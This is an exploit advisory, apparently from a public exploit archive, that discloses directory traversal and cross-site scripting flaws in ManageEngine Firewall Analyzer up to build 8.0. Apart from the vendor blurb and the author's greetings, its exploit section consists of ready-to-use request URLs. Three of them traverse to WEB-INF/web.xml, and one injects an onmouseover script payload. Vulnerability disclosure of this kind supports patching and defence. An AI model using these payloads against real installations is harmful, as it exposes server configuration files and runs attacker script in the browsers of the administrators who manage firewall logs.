50 lines
No EOL
1.8 KiB
Text
50 lines
No EOL
1.8 KiB
Text
################################################################################################
|
|
# #
|
|
# ...:::::ManageEngine Firewall Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
|
|
# #############################################################################################
|
|
|
|
|
|
Sobhan System Network & Security Group (sobhansys)
|
|
|
|
-------------------------------------------------------
|
|
# Date: 2015-01-28
|
|
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
|
|
# Vendor Homepage: http://www.manageengine.com/products/firewall/
|
|
# Demo Link: http://demo.fwanalyzer.com/
|
|
#Affected version: <= Build Version : 8.0
|
|
|
|
About ManageEngine Firewall Analyzer (From Vendor Site) :
|
|
|
|
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software
|
|
that helps network administrators to centrally collect, archive, analyze
|
|
their security device logs and generate forensic reports out of it.
|
|
--------------------------------------------------------
|
|
|
|
|
|
I'M hadihadi From Virangar Security Team
|
|
|
|
special tnx to:MR.nosrati,black.shadowes,MR.hesy
|
|
& all virangar members & all hackerz
|
|
|
|
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
|
|
|
|
spl:Z.Khodaee
|
|
|
|
-------
|
|
exploit:
|
|
|
|
Diretory Traversal :
|
|
|
|
http://127.0.0.1/fw/mindex.do?url=./WEB-INF/web.xml%3f
|
|
http://127.0.0.1/fw/index2.do?completeData=true&helpP=archiveAction&tab=system&url=./WEB-INF/web.xml%3f
|
|
http://127.0.0.1/fw/index2.do?helpP=fim&link=0&sel=13&tab=system&url=./WEB-INF/web.xml%3f
|
|
|
|
XSS :
|
|
|
|
http://127.0.0.1/fw/index2.do?completeData=true&url=importedLogDetails" onmouseover%3dprompt(902321) bad%3d"
|
|
|
|
----
|
|
Sobhan system Co.
|
|
Signal Network And Security Group (www.signal-net.net)
|
|
|
|
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net |